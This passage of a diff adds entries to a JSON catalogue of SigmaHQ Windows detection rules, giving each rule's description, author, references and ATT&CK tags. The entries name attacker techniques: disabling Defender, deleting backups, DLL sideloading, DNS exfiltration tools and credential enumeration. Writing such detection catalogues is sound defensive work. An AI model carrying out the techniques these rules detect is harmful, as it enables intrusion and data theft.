"https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto Mining Indicators" + }, + { + "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_curl_download.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "value": "Curl Usage on Windows" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ] + }, + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." + ], + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe" + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup" + }, + { + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "4e762605-34a8-406d-b72e-c1a089313320", + "value": "Detecting Fake Instances Of Hxtsr.exe" + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". \nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe" + }, + { + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_dinjector.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/snovvcrash/DInjector", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "value": "DInject PowerShell Cradle CommandLine Flags" + }, + { + "description": "Detect use of DirLister.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_dirlister.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable" + }, + { + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "meta": { + "author": "ok @securonix invrep-de, oscd.community, frack113", + "creation_date": "2020/10/12", + "falsepositive": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + ], + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring" + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrators settings a service to disable via script or cli for testing purposes" + ], + "filename": "proc_creation_win_disable_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_discover_private_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys" + }, + { + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dll_sideload_defender.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender" + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility" + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/08", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ] + }, + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" + }, + { + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/07/31", + "falsepositive": [ + "Legitimate administration use" + ], + "filename": "proc_creation_win_dnscmd_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1543.003" + ] + }, + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe" + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" + ], + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ] + }, + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install" + }, + { + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_dotnet.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls" + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "filename": "proc_creation_win_dsacls_password_spray.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls" + }, + { + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_dsim_remove.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package" + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion" + }, + { + "description": "Detects email exfiltration via powershell cmdlets", + "meta": { + "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_email_exfil_via_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", + "value": "Email Exifiltration Via Powershell" + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "filename": "proc_creation_win_embed_exe_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=embed_exe_lnk", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern" + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String" + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX" + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": "Enumeration for 3rd Party Creds From CLI" + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry" + }, + { + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_esentutl_webcache.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "value": "Esentutl Steals Browser Information" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "COMPlus_ETWEnabled Command Line Arguments" + }, + { + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "meta": { + "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ] + }, + "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "value": "Disable of ETW Trace" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_evil_winrm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM" + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate Administrator using tools" + ], + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ] + }, + "uuid": 